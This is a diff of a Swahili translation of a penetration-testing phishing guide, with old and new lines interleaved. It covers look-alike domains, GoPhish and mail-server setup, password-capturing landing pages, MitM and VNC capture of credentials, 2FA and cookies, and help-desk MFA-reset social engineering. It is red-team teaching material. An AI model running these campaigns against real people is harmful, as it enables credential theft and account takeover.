- **Subdomained**: Weka **dot** ndani ya jina la domain (mfano, ze.lster.com).
- **Insertion**: Inaingiza herufi ndani ya jina la domain (mfano, zerltser.com).
- **Missing dot**: Ambatisha TLD kwenye jina la domain. (mfano, zelstercom.com)
**Automatic Tools**
@ -52,25 +52,25 @@ homograph-attacks.md
### Bitflipping
Kuna uwezekano kwamba moja ya bits zilizohifadhiwa au zinazotumwa inaweza kupinduliwa kiotomatiki kutokana na sababu mbalimbali kama solar flares, cosmic rays, au makosa ya hardware.
Kuna uwezekano kwamba baadhi ya bits zilizohifadhiwa au zinazosafirishwa zinaweza kugeuka moja kwa moja kutokana na sababu mbalimbali kama solar flares, cosmic rays, au hitilafu za hardware.
Wakati dhana hii inapotumika kwa maombi ya DNS, inawezekana kwamba domain iliyopokelewa na DNS server si ile ile iliyokuwa imeombwa awali.
Wakati dhana hii inatumika kwa maombi ya DNS, inawezekana kwamba domain iliyopokelewa na server ya DNS sio ile ile iliyombwa awali.
Kwa mfano, mabadiliko ya bit moja kwenye domain "windows.com" yanaweza kuibadilisha kuwa "windnws.com."
Kwa mfano, mabadiliko ya bit moja katika domain "windows.com" yanaweza kuibadilisha kuwa "windnws.com."
Attackers wanaweza kuchukua faida ya hili kwa kusajili domains nyingi za bit-flipping zinazofanana na domain ya victim. Kusudio lao ni kupeleka watumiaji halali kwenye infrastructure yao.
Attackers wanaweza **kuitumia hali hii kwa kusajili multiple bit-flipping domains** zinazofanana na domain ya mjeruhi. Kusudi lao ni kupitisha watumiaji halali kwa infrastructure yao.
Kwa taarifa zaidi soma [https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/](https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/)
Kwa maelezo zaidi soma [https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/](https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/)
### Nunua domain yenye kuaminika
### Buy a trusted domain
Unaweza kutafuta kwenye [https://www.expireddomains.net/](https://www.expireddomains.net) domain iliyokwisha muda ambayo unaweza kutumia.\
Ili kuhakikisha kwamba expired domain unayopanga kununua tayari ina SEO nzuri unaweza kuangalia jinsi ilivyokatagoriwa katika:
Unaweza kutafuta kwenye [https://www.expireddomains.net/](https://www.expireddomains.net) domain iliyokwisha kuisha ambayo unaweza kununua.\
Ili kuhakikisha kuwa expired domain utakayenunua **inamiliki SEO nzuri** tayari unaweza kuangalia jinsi ilivyoainishwa katika:
- [http://www.fortiguard.com/webfilter](http://www.fortiguard.com/webfilter)
- [https://urlfiltering.paloaltonetworks.com/query/](https://urlfiltering.paloaltonetworks.com/query/)
## Kugundua Emails
## Discovering Emails
- [https://github.com/laramies/theHarvester](https://github.com/laramies/theHarvester) (100% free)
- [https://phonebook.cz/](https://phonebook.cz) (100% free)
@ -78,25 +78,25 @@ Ili kuhakikisha kwamba expired domain unayopanga kununua tayari ina SEO nzuri un
- [https://hunter.io/](https://hunter.io)
- [https://anymailfinder.com/](https://anymailfinder.com)
Ili kugundua zaidi anwani za email halali au kuthibitisha zile ulizogundua tayari unaweza kuangalia kama unaweza ku-brute-force smtp servers za victim. [Learn how to verify/discover email address here](../../network-services-pentesting/pentesting-smtp/index.html#username-bruteforce-enumeration).\
Zaidi ya hayo, usisahau kwamba ikiwa watumiaji wanatumia any web portal kufikia mails zao, unaweza kuangalia kama ni vunja kwa username brute force, na kutumia udhaifu huo ikiwa inawezekana.
Ili **discover more** valid email addresses au **verify the ones** tayari umevumbua unaweza kuangalia kama unaweza brute-force smtp servers za mjeruhi. [Learn how to verify/discover email address here](../../network-services-pentesting/pentesting-smtp/index.html#username-bruteforce-enumeration).\
Zaidi ya hayo, usisahau kwamba ikiwa watumiaji wanatumia **any web portal to access their mails**, unaweza kuangalia kama iko vulnerable kwa **username brute force**, na kufungua mdudu huo ikiwa inawezekana.
## Configuring GoPhish
### Installation
### Ufungaji
Unaweza kupakua kutoka [https://github.com/gophish/gophish/releases/tag/v0.11.0](https://github.com/gophish/gophish/releases/tag/v0.11.0)
You can download it from [https://github.com/gophish/gophish/releases/tag/v0.11.0](https://github.com/gophish/gophish/releases/tag/v0.11.0)
Download na decompress ndani ya `/opt/gophish` na uendeshe `/opt/gophish/gophish`\
Utapewa password kwa admin user kwenye port 3333 katika output. Kwa hiyo, ingia kwenye port hiyo na tumia yale credentials kubadilisha admin password. Unaweza kuhitaji ku-tunnel port hiyo hadi local:
Download and decompress it inside `/opt/gophish` and execute `/opt/gophish/gophish`\
Utapewa password ya user admin kwenye port 3333 kwenye output. Kwa hiyo, pata access kwenye port hiyo na tumia credentials hizo kubadilisha password ya admin. Huenda ukahitaji ku-tunnel port hiyo kwa local:
```bash
ssh -L 3333:127.0.0.1:3333 <user>@<ip>
```
### Usanidi
**Usanidi wa cheti la TLS**
**Usanidi wa cheti cha TLS**
Kabla ya hatua hii unapaswa kuwa tayari umenunua kikoa utakayotumia, na lazima kiwe kimeelekezwa kwenye IP ya VPS ambapo unasanidi gophish.
Kabla ya hatua hii unapaswa kuwa **tayari umenunua kikoa** utakachotumia na lazima **kimeelekezwa** kwa **IP ya VPS** ambapo unasanidi **gophish**.
```bash
DOMAIN="<domain>"
wget https://dl.eff.org/certbot-auto
@ -112,24 +112,24 @@ mkdir /opt/gophish/ssl_keys
cp "/etc/letsencrypt/live/$DOMAIN/privkey.pem" /opt/gophish/ssl_keys/key.pem
cp "/etc/letsencrypt/live/$DOMAIN/fullchain.pem" /opt/gophish/ssl_keys/key.crt
```
**Usanidi wa barua pepe**
**Usanidi wa barua**
Anza kusakinisha: `apt-get install postfix`
Kisha ongeza domain kwenye faili zifuatazo:
Kisha ongeza jina la kikoa kwenye faili zifuatazo:
- **/etc/postfix/virtual_domains**
- **/etc/postfix/transport**
- **/etc/postfix/virtual_regexp**
**Pia badilisha thamani za vigezo vifuatavyo ndani ya /etc/postfix/main.cf**
**Badilisha pia thamani za vigezo vifuatavyo ndani ya /etc/postfix/main.cf**
`myhostname = <domain>`\
`mydestination = $myhostname, <domain>, localhost.com, localhost`
Mwisho, badilisha mafaili **`/etc/hostname`** na **`/etc/mailname`** kwa jina lako la domain na **anzisha upya VPS yako.**
Mwisho badilisha faili **`/etc/hostname`** na **`/etc/mailname`** kwa jina la kikoa chako na anzisha upya VPS yako.
Sasa, tengeneza **DNS A record** ya `mail.<domain>` inayoelekeza kwa **ip address** ya VPS na rekodi ya **DNS MX** inayoelekeza kwa `mail.<domain>`
Sasa, tengeneza rekodi ya **DNS A record** ya `mail.<domain>` ikielekeza kwa **anwani ya IP** ya VPS na rekodi ya **DNS MX** ikielekeza `mail.<domain>`
Sasa tujaribu kutuma barua pepe:
```bash
@ -138,8 +138,8 @@ echo "This is the body of the email" | mail -s "This is the subject line" test@e
```
**Usanidi wa Gophish**
Simamisha gophish na tufanye usanidi wake.\
Badilisha `/opt/gophish/config.json` kuwa ifuatayo (kumbuka matumizi ya https):
Simamisha utekelezaji wa Gophish na tufanye usanidi wake.\
Badilisha `/opt/gophish/config.json` kuwa ifuatayo (tazama matumizi ya https):
```bash
{
"admin_server": {
@ -164,9 +164,9 @@ Badilisha `/opt/gophish/config.json` kuwa ifuatayo (kumbuka matumizi ya https):
}
}
```
**Sanidi huduma ya gophish**
**Sanidi gophish service**
Ili kuunda huduma ya gophish ili iweze kuanzishwa kiotomatiki na kusimamiwa kama huduma, unaweza kuunda faili `/etc/init.d/gophish` yenye maudhui yafuatayo:
Ili kuunda gophish service ili iweze kuanzishwa kiotomatiki na kusimamiwa kama service, unaweza kuunda faili `/etc/init.d/gophish` yenye yaliyomo yafuatayo:
```bash
#!/bin/bash
# /etc/init.d/gophish
@ -213,7 +213,7 @@ case $1 in
start|stop|status) "$1" ;;
esac
```
Maliza kusanidi huduma na kuangalia inavyofanya:
Maliza kusanidi huduma na kuikagua kwa kufanya:
```bash
mkdir /var/log/gophish
chmod +x /etc/init.d/gophish
@ -224,60 +224,60 @@ service gophish status
ss -l | grep "3333\|443"
service gophish stop
```
## Kusanidi mail server na domain
## Kusanidi server ya barua na domain
### Subiri & kuwa halali
Kadri domain inavyokuwa ya zamani, ndivyo uwezekano wa kugunduliwa kama spam unavyopungua. Kwa hivyo unapaswa kusubiri muda mrefu iwezekanavyo (angalau 1week) kabla ya phishing assessment. Zaidi ya hayo, ukiongeza ukurasa kuhusu sekta yenye sifa, sifa utakayopata itakuwa bora.
Kadiri domain inavyozeeka, ndivyo uwezekano wake wa kushikiliwa kama spam unavyopungua. Kwa hivyo unapaswa kusubiri muda mwingi iwezekanavyo (angalau wiki 1) kabla ya tathmini ya phishing. Zaidi ya hayo, ikiwa utaweka ukurasa kuhusu sekta yenye sifa nzuri, sifa utakazopata itakuwa bora.
Kumbuka kwamba hata ukilazimika kusubiri wiki unaweza kumaliza kusanidi kila kitu sasa.
Kumbuka kwamba hata kama unapaswa kusubiri wiki moja, unaweza kumaliza kusanidi kila kitu sasa.
### Sanidi Reverse DNS (rDNS) record
### Sanidi rekodi ya Reverse DNS (rDNS)
Weka rekodi ya rDNS (PTR) inayotatua IP address ya VPS kwa jina la domain.
Weka rekodi ya rDNS (PTR) inayotatua anwani ya IP ya VPS kwa jina la domain.
### Rekodi ya Sender Policy Framework (SPF)
Unapaswa **kusanidi SPF record kwa domain mpya**. Ikiwa haujui SPF record ni nini [**read this page**](../../network-services-pentesting/pentesting-smtp/index.html#spf).
Unapaswa **kusanidi rekodi ya SPF kwa domain mpya**. Ikiwa haujui SPF ni nini [**read this page**](../../network-services-pentesting/pentesting-smtp/index.html#spf).
Unaweza kutumia [https://www.spfwizard.net/](https://www.spfwizard.net) kuunda SPF policy yako (tumia IP ya mashine ya VPS)
Unaweza kutumia [https://www.spfwizard.net/](https://www.spfwizard.net) kutengeneza sera yako ya SPF (tumia anwani ya IP ya mashine ya VPS)
![](<../../images/image (1037).png>)
Hili ndilo maudhui yanayopaswa kuwekwa ndani ya TXT record ndani ya domain:
Hii ndiyo yaliyomo yanayotakiwa kuwekwa ndani ya rekodi ya TXT katika domain:
```bash
v=spf1 mx a ip4:ip.ip.ip.ip ?all
```
### Uthibitishaji wa Ujumbe Unaotegemea Domain, Ripoti & Utii (DMARC) Rekodi
### Rekodi ya Uthibitishaji wa Ujumbe Unaotegemea Domain, Kuripoti & Utii (DMARC)
Lazima **usanidi rekodi ya DMARC kwa domain mpya**. Ikiwa haujui ni rekodi ya DMARC ni nini [**read this page**](../../network-services-pentesting/pentesting-smtp/index.html#dmarc).
Lazima **usanidi rekodi ya DMARC kwa domain mpya**. Ikiwa hujui rekodi ya DMARC ni nini [**read this page**](../../network-services-pentesting/pentesting-smtp/index.html#dmarc).
Unahitaji kuunda rekodi mpya ya DNS TXT ikielekeza hostname `_dmarc.<domain>` na yaliyomo yafuatayo:
Unapaswa kuunda rekodi mpya ya DNS TXT inayolenga jina la mwenyeji `_dmarc.<domain>` na maudhui yafuatayo:
```bash
v=DMARC1; p=none
```
### DomainKeys Identified Mail (DKIM)
Unapaswa **kusanidi DKIM kwa domain mpya**. Ikiwa haujui ni rekodi ya DMARC ni nini [**soma ukurasa huu**](../../network-services-pentesting/pentesting-smtp/index.html#dkim).
Lazima **usanidi DKIM kwa domain mpya**. Ikiwa haujui rekodi ya DMARC ni nini [**soma ukurasa huu**](../../network-services-pentesting/pentesting-smtp/index.html#dkim).
This tutorial is based on: [https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy)
> [!TIP]
> Unahitaji kuunganisha thamani zote mbili za B64 ambazo ufunguo wa DKIM unazozalisha:
> Unahitaji kuunganisha thamani zote mbili za B64 ambazo DKIM key inazalisha:
>
> ```
> v=DKIM1; h=sha256; k=rsa; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0wPibdqPtzYk81njjQCrChIcHzxOp8a1wjbsoNtka2X9QXCZs+iXkvw++QsWDtdYu3q0Ofnr0Yd/TmG/Y2bBGoEgeE+YTUG2aEgw8Xx42NLJq2D1pB2lRQPW4IxefROnXu5HfKSm7dyzML1gZ1U0pR5X4IZCH0wOPhIq326QjxJZm79E1nTh3xj" "Y9N/Dt3+fVnIbMupzXE216TdFuifKM6Tl6O/axNsbswMS1TH812euno8xRpsdXJzFlB9q3VbMkVWig4P538mHolGzudEBg563vv66U8D7uuzGYxYT4WS8NVm3QBMg0QKPWZaKp+bADLkOSB9J2nUpk4Aj9KB5swIDAQAB
> ```
### Test your email configuration score
### Pima alama ya usanidi wa barua pepe yako
Unaweza kufanya hivyo kwa kutumia [https://www.mail-tester.com/](https://www.mail-tester.com/)\
Fungua ukurasa huo na tuma barua pepe kwa anwani watakayo kutoa:
Unaweza kufanya hivyo kwa kutumia [https://www.mail-tester.com/](https://www.mail-tester.com)\
Ingia tu kwenye ukurasa na utume barua pepe kwa anwani watakayokupa:
```bash
echo "This is the body of the email" | mail -s "This is the subject line" test-iimosa79z@srv1.mail-tester.com
```
Unaweza pia **kukagua usanidi wako wa barua pepe** kwa kutuma barua pepe kwa `check-auth@verifier.port25.com` na **kusoma majibu** (kwa hili utahitaji **kufungua** port **25** na kuona majibu katika faili _/var/mail/root_ ikiwa utatuma barua pepe a kama root).\
Angalia kwamba unapitisha vipimo vyote:
Unaweza pia **kagua usanidi wa barua pepe yako** kwa kutuma barua pepe kwa `check-auth@verifier.port25.com` na **kusoma jibu** (kwa hili utahitaji **kufungua** port **25** na kuona jibu katika faili _/var/mail/root_ ikiwa utatuma barua pepe kama root).\
Hakikisha kwamba unapitisha mitihani yote:
```bash
==========================================================
Summary of Results
@ -288,40 +288,40 @@ DKIM check: pass
Sender-ID check: pass
SpamAssassin check: ham
```
Unaweza pia kutuma **ujumbe kwa akaunti ya Gmail unayodhibiti**, na ukague **vichwa vya barua pepe** katika inbox yako ya Gmail, `dkim=pass` inapaswa kuwepo katika uwanja wa kichwa `Authentication-Results`.
Unaweza pia kutuma **ujumbe kwa Gmail unayodhibiti**, na kuangalia **emails headers** kwenye inbox yako ya Gmail, `dkim=pass` inapaswa kuwepo katika `Authentication-Results` header field.
```
Authentication-Results: mx.google.com;
spf=pass (google.com: domain of contact@example.com designates --- as permitted sender) smtp.mail=contact@example.com;
dkim=pass header.i=@example.com;
```
### Kuondolewa kwenye Orodha Nyeusi ya Spamhouse
### Kuondoa kutoka Spamhouse Blacklist
Ukurasa [www.mail-tester.com](https://www.mail-tester.com) unaweza kukuonyesha kama domain yako inazuiliwa na spamhouse. Unaweza kuomba domain/IP yako iondolewe kwa: [https://www.spamhaus.org/lookup/](https://www.spamhaus.org/lookup/)
Tovuti [www.mail-tester.com](https://www.mail-tester.com) inaweza kukuonyesha ikiwa domain yako inazuiawa na Spamhouse. Unaweza kuomba domain/IP yako iondolewe kwenye: [https://www.spamhaus.org/lookup/](https://www.spamhaus.org/lookup/)
### Kuondolewa kwenye Orodha Nyeusi ya Microsoft
### Kuondoa kutoka Microsoft Blacklist
Unaweza kuomba domain/IP yako iondolewe kwa [https://sender.office.com/](https://sender.office.com).
Unaweza kuomba domain/IP yako iondolewe kwenye [https://sender.office.com/](https://sender.office.com).
## Unda & Anzisha Kampeni ya GoPhish
### Profaili ya Kutuma
- Weka **jina la utambuzi** la profaili ya mtumaji
- Amua kutoka kwa akaunti ipi utakayotumia kutuma phishing emails. Mapendekezo: _noreply, support, servicedesk, salesforce..._
- Unaweza kuacha username na password wazi, lakini hakikisha umechagua Ignore Certificate Errors
- Weka baadhi ya **jina la kutambua** profaili ya mtumaji
- Amua kutoka akaunti gani utatumia kutuma barua pepe za phishing. Mapendekezo: _noreply, support, servicedesk, salesforce..._
- Unaweza kuacha jina la mtumiaji na nenosiri tupu, lakini hakikisha umeweka alama kwenye Ignore Certificate Errors
![](<../../images/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (15) (2).png>)
> [!TIP]
> Inashauriwa kutumia kipengele cha "**Send Test Email**" ili kujaribu kwamba kila kitu kinafanya kazi.\
> Ninapendekeza **kutuma barua za jaribio kwa anwani za 10min mails** ili kuepuka kuwekwa kwenye orodha nyeusi wakati wa majaribio.
> Inashauriwa kutumia kipengee cha "**Send Test Email**" kujaribu kwamba kila kitu kinafanya kazi.\
> Ningependekeza **kutuma barua za mtihani kwa anwani za 10min mails** ili kuepuka kuingia kwenye blacklist wakati wa kufanya majaribio.
### Kiolezo cha Barua Pepe
### Templeti ya Barua Pepe
- Weka **jina la utambuzi** la kiolezo
- Kisha andika **subject** (hakuna kitu cha kigeni, tu kile unachoweza kutarajia kusoma katika barua pepe ya kawaida)
- Weka baadhi ya **jina la kutambua** templeti
- Kisha andika **subject** (si kitu cha kushangaza, tu kitu ungetarajia kusoma katika barua pepe ya kawaida)
- Hakikisha umechagua "**Add Tracking Image**"
- Andika **kiolezo cha barua pepe** (unaweza kutumia variables kama katika mfano ufuatao):
- Andika **email template** (unaweza kutumia vigezo kama katika mfano ufuatao):
```html
<html>
<head>
@ -340,11 +340,11 @@ WRITE HERE SOME SIGNATURE OF SOMEONE FROM THE COMPANY
</body>
</html>
```
Kumbuka kwamba **ili kuongeza uhalali wa email**, inashauriwa kutumia baadhi ya saini kutoka kwenye email ya mteja. Mapendekezo:
Kumbuka kwamba **ili kuongeza uhalali wa barua pepe**, inapendekezwa kutumia baadhi ya sahihi (signature) kutoka kwa barua pepe ya mteja. Mapendekezo:
- Tuma email kwa **anwani isiyokuwepo** na angalia kama jibu lina saini yoyote.
- Tafuta **emails za umma** kama info@ex.com au press@ex.com au public@ex.com na utume email kwao na usubiri jibu.
- Jaribu kuwasiliana na **email sahihi iliyogunduliwa** na subiri jibu
- Tuma barua pepe kwa **anwani isiyopo** na angalia kama jibu lina sahihi yoyote.
- Tafuta **barua pepe za umma** kama info@ex.com au press@ex.com au public@ex.com na utumie barua pepe na subiri jibu.
- Jaribu kuwasiliana na **barua pepe halali ulizogundua** na subiri jibu
![](<../../images/image (80).png>)
@ -354,42 +354,42 @@ Kumbuka kwamba **ili kuongeza uhalali wa email**, inashauriwa kutumia baadhi ya
### Landing Page
- Andika **jina**
- **Andika the HTML code** ya ukurasa wa wavuti. Kumbuka kwamba unaweza **ku-import** web pages.
- Mark **Capture Submitted Data** na **Capture Passwords**
- **Andika HTML code** ya ukurasa wa wavuti. Kumbuka unaweza **kuingiza** kurasa za wavuti.
- Chagua **Capture Submitted Data** na **Capture Passwords**
- Weka **redirection**
![](<../../images/image (826).png>)
> [!TIP]
> Kwa kawaida utahitaji kubadilisha code ya HTML ya ukurasa na kufanya majaribio kwa local (labda ukitumia Apache server) **mpaka utakapopendeza matokeo.** Kisha, andika hiyo HTML code kwenye box.
> Kumbuka kwamba ikiwa unahitaji **kutumia static resources** kwa HTML (labda baadhi ya CSS na JS pages) unaweza kuziweka katika _**/opt/gophish/static/endpoint**_ na kisha kuzipata kutoka _**/static/\<filename>**_
> Kwa kawaida utahitaji kubadilisha HTML ya ukurasa na kufanya majaribio pale kwa mtaa (labda ukitumia server ya Apache) **hadi utakapofurahia matokeo.** Kisha, andika HTML hiyo kwenye kisanduku.\
> Kumbuka kwamba ikiwa unahitaji **kutumia rasilimali zisizo za mabadiliko** kwa HTML (labda baadhi ya kurasa za CSS na JS) unaweza kuzihifadhi katika _**/opt/gophish/static/endpoint**_ kisha uzifikishe kutoka _**/static/\<filename>**_
> [!TIP]
> Kwa redirection unaweza **ku-redirect watumiaji kwenye ukurasa halali wa mwanzo** wa mwathiriwa, au ku-redirect kwa _/static/migration.html_ kwa mfano, weka **spinning wheel (**[**https://loading.io/**](https://loading.io)**) kwa sekunde 5 kisha onyesha kuwa mchakato umefanikiwa**.
> Kwa ajili ya redirection unaweza **kupeleka watumiaji kwenye ukurasa mkuu halali** wa mwathiri, au kuwarudisha kwa _/static/migration.html_ kwa mfano, weka **spinning wheel (**[**https://loading.io/**](https://loading.io)**) kwa sekunde 5 kishaonyesha kwamba mchakato ulifanikiwa**.
### Users & Groups
- Weka jina
- **Import the data** (kumbuka kwamba ili kutumia template kwa mfano unahitaji jina la kwanza, jina la mwisho na email address ya kila mtumiaji)
- **Import the data** (kumbuka kwamba ili kutumia template kwa mfano utahitaji firstname, last name na email address ya kila mtumiaji)
![](<../../images/image (163).png>)
### Campaign
Hatimaye, unda kampeni ukichagua jina, email template, landing page, URL, sending profile na group. Kumbuka kwamba URL itakuwa link itakayotumwa kwa waathiriwa
Mwishowe, unda campaign ukichagua jina, email template, landing page, URL, sending profile na group. Kumbuka kwamba URL itakuwa link itakayotumwa kwa waathiriwa
Kumbuka pia kwamba **Sending Profile inaruhusu kutuma test email ili kuona jinsi email ya hatima itakavyoonekana**:
Kumbuka kwamba **Sending Profile** inaruhusu kutuma barua pepe ya mtihani kuona jinsi barua pepe ya mwisho ya phishing itakavyoonekana:
![](<../../images/image (192).png>)
> [!TIP]
> Napendekeza **kutuma test emails kwa anwani za 10min mails** ili kuepuka kuorodheshwa kwenye blacklist wakati wa kufanya majaribio.
> Ningependekeza **kutuma barua pepe za mtihani kwa anwani za 10min mails** ili kuepuka kusukwa kwenye blacklist wakati wa kufanya majaribio.
Mara kila kitu kikiwa tayari, anza kampeni tu!
Mara kila kitu kiko tayari, anzisha tu campaign!
## Website Cloning
Ikiwa kwa sababu yoyote ungependa kukopa tovuti angalia ukurasa ufuatao:
Ikiwa kwa sababu yoyote unataka kunakili tovuti angalia ukurasa ufuatao:
{{#ref}}
@ -398,8 +398,8 @@ clone-a-website.md
## Backdoored Documents & Files
Katika baadhi ya tathmini za phishing (hasa kwa Red Teams) utataka pia **kutuma files zenye aina fulani ya backdoor** (labda C2 au labda kitu ambacho kitachochea authentication).\
Angalia ukurasa ufuatao kwa baadhi ya mifano:
Katika baadhi ya tathmini za phishing (hasa kwa Red Teams) utataka pia **kutuma faili zenye aina fulani ya backdoor** (labda C2 au labda kitu ambacho kitachochea uthibitisho).\
Tazama ukurasa ufuatao kwa baadhi ya mifano:
{{#ref}}
@ -410,53 +410,53 @@ phishing-documents.md
### Via Proxy MitM
Shambulio lililotangulia ni changamto kwani unafanana na tovuti halisi na kukusanya taarifa zilizowekwa na mtumiaji. Kwa bahati mbaya, ikiwa mtumiaji hakuweka password sahihi au ikiwa application uliyofanya clone imewekwa na 2FA, **taarifa hizi hazitatumika kukufanya uende kama mtumiaji aliyefumwa**.
Shambulio lililotangulia ni janja kwa kuwa unalifanya kuwa tovuti halisi na kukusanya taarifa zilizopakiwa na mtumiaji. Kwa bahati mbaya, kama mtumiaji hakuweka nenosiri sahihi au ikiwa application uliyofanyia fake imewekwa na 2FA, **taarifa hizi hazitatumika kukufanya ujifikirie kama mtumiaji aliyepigwa wizi**.
Hapa ndipo zana kama [**evilginx2**](https://github.com/kgretzky/evilginx2)**,** [**CredSniper**](https://github.com/ustayready/CredSniper) na [**muraena**](https://github.com/muraenateam/muraena) zinapoweza kusaidia. Zana hizi zitakuwezesha kuzalisha shambulio la MitM. Kwa msingi, shambulio hufanya kazi kwa njia ifuatayo:
Hapa ndio ambapo zana kama [**evilginx2**](https://github.com/kgretzky/evilginx2)**,** [**CredSniper**](https://github.com/ustayready/CredSniper) na [**muraena**](https://github.com/muraenateam/muraena) zinakuwa muhimu. Zana hizi zitakuwezesha kuanzisha shambulio la MitM. Kwa msingi, shambulio linafanya hivi:
1. Unachanganya fomu ya **login** ya ukurasa halisi.
2. Mtumiaji **anatuma** credential zake kwenye ukurasa wako wa fake na zana inazituma kwenye ukurasa halisi, **ikikagua kama credentials zinafanya kazi**.
3. Ikiwa akaunti imewekwa na **2FA**, ukurasa wa MitM utaomba 2FA na mara mtumiaji **akitolea** itaambatishwa kwenye ukurasa halisi.
4. Mara mtumiaji anapothibitishwa wewe (kama mshambulizi) utakuwa ume **kamata credentials, 2FA, cookie na taarifa zote** za kila mwingiliano wakati zana ikifanya MitM.
1. Unafanya **impersonate** fomu ya login ya ukurasa halisi.
2. Mtumiaji **anatuma** **credentials** zake kwenye ukurasa wako bandia na zana inazituma kwa ukurasa halisi, **kukagua kama credentials zinafanya kazi**.
3. Ikiwa akaunti imewekwa na **2FA**, ukurasa wa MitM utaomba hiyo na mara **mtumiaji anapoiingiza** zana itaipeleka kwenye ukurasa halisi.
4. Mara mtumiaji akithibitishwa wewe (kama mshambuliaji) utakuwa umekamata **credentials, 2FA, cookie na taarifa yoyote** ya kila mwingiliano wakati zana inafanya MitM.
### Via VNC
Je, badala ya **kumtamisha mwathiriwa kwenye ukurasa wa uhalifu** unaoonekana kama wa awali, ungeweza kumpeleka kwenye **kikao cha VNC chenye browser iliyounganishwa kwenye ukurasa halisi**? Utaweza kuona anachofanya, kuiba password, MFA iliyotumika, cookies...\
Unaweza kufanya hivi kwa kutumia [**EvilnVNC**](https://github.com/JoelGMSec/EvilnoVNC)
Je, vipi ikiwa badala ya **kumpeleka mhusika kwenye ukurasa wa ulaghai** unaoonekana kama asili, unampeleka kwenye **vituo vya VNC na browser iliyounganika kwenye ukurasa halisi**? Utaweza kuona anachofanya, kuiba nenosiri, MFA iliyotumika, cookies...\
Unaweza kufanya hili na [**EvilnVNC**](https://github.com/JoelGMSec/EvilnoVNC)
## Detecting the detection
Obvious moja ya njia bora za kujua kama umeuawa ni **kutafuta domain yako ndani ya blacklists**. Ikiwa inaonekana imeorodheshwa, kwa namna fulani domain yako iligunduliwa kama shaka.\
Njia moja rahisi ya kukagua kama domain yako inaonekana kwenye blacklist ni kutumia [https://malwareworld.com/](https://malwareworld.com)
Kwa wazi mojawapo ya njia bora za kujua kama umegunduliwa ni **kutafuta domain yako ndani ya blacklists**. Ikiwa inaonekana kwenye orodha, kwa namna fulani domain yako ilitambuliwa kama ya kutiliwa shaka.\
Njia rahisi ya kuangalia kama domain yako inaonekana kwenye blacklist yoyote ni kutumia [https://malwareworld.com/](https://malwareworld.com)
Hata hivyo, kuna njia nyingine za kujua kama mwathiriwa anatafuta kwa uangalifu shughuli za phishing zenye shaka kama ilivyoelezwa kwenye:
Hata hivyo, kuna njia nyingine za kujua kama mhusika **anatafuta kwa umakini shughuli za phishing zinazoshukiwa** kama ilivyoelezwa katika:
{{#ref}}
detecting-phising.md
{{#endref}}
Unaweza **kununua domain yenye jina linalofanana sana** na domain ya mwathiriwa **na/au kuzalisha certificate** kwa **subdomain** ya domain unayodhibiti **lenye** **keyword** ya domain ya mwathiriwa. Ikiwa **mwathiriwa** atafanya aina yoyote ya mwingiliano wa **DNS au HTTP** nao, utajua kuwa **yeye anatafuta kwa ufanisi** domains zenye shaka na utahitaji kuwa mwiba sana.
Unaweza **kununua domain yenye jina linalofanana sana** na domain ya mwathiri **na/au kuunda certificate** kwa **subdomain** ya domain inayodhibitiwa na wewe **inayoambatanisha** **keyword** ya domain ya mwathiri. Ikiwa **mwathiri** atafanya aina yoyote ya **DNS au HTTP interaction** nayo, utajua kwamba **yeye anaangalia kwa makini** kwa ajili ya domains zinazoshukiwa na utahitaji kuwa sana mnyonge.
### Evaluate the phishing
Tumia [**Phishious** ](https://github.com/Rices/Phishious) kutathmini kama email yako itaishia kwenye spam folder au itazuiliwa au itafanikiwa.
Tumia [**Phishious** ](https://github.com/Rices/Phishious)kuangalia kama barua pepe yako itamalizika katikati ya folda ya spam au ikiwa itazuiliwa au itafanikiwa.
## High-Touch Identity Compromise (Help-Desk MFA Reset)
Sets za uvamizi wa kisasa mara nyingi hupuuza malengo ya email kabisa na **hufokusisha moja kwa moja mchakato wa service-desk / identity-recovery** ili kuondoa MFA. Shambulio hilo ni kamili "living-off-the-land": mara operator anapomiliki credentials halali wanapitia na zana za admin zilizojengwa hakuna malware inayohitajika.
Seti za uvamizi za kisasa mara nyingi zinapita uhamasishaji wa barua pepe kabisa na **kuwakwabua moja kwa moja utaratibu wa service-desk / identity-recovery** ili kuvunja MFA. Shambulio hutegemea kabisa "living-off-the-land": mara operator anapokuwa na credentials halali wanabadilisha kwa zana za admin zilizo ndani hakuna malware inayohitajika.
### Attack flow
1. Recon ya mwathiriwa
* Pata maelezo ya binafsi & ya kampuni kutoka LinkedIn, data breaches, public GitHub, n.k.
* Tambua identities zenye thamani kubwa (maafisa wakuu, IT, fedha) na weka orodha ya **hasa ya mchakato wa help-desk** kwa reset ya password / MFA.
2. Social engineering kwa wakati halisi
* Piga simu, tumia Teams au chat kwa help-desk ukijinakili kuwa ni eneo lengwa (mara nyingi kwa **spoofed caller-ID** au **cloned voice**).
* Toa PII iliyokusanywa ili kupita uthibitishaji wa maarifa.
* Mshawishi afanye **reset ya MFA secret** au kufanya **SIM-swap** kwenye namba ya simu iliyosajiliwa.
3. Hatua za mara moja baada ya kupata (≤60 min katika kesi halisi)
* Anzisha foothold kupitia portal yoyote ya web SSO.
* Ordoza AD / AzureAD kwa kutumia built-ins (bila kupeleka binaries):
1. Recon kwa mhusika
* Kukusanya maelezo binafsi & ya kampuni kutoka LinkedIn, data breaches, public GitHub, n.k.
* Tambua vitambulisho vyenye thamani kubwa (wakuu, IT, fedha) na orodhesha **mchakato wa help-desk** kwa usahihi kwa ajili ya reset ya password / MFA.
2. Social engineering ya wakati-halisi
* Simu, Teams au chat help-desk huku ukijifanya kuwa mhusika (mara nyingi kwa **spoofed caller-ID** au **cloned voice**).
* Toa PII iliyokusanywa awali ili kupita ukaguzi wa maarifa.
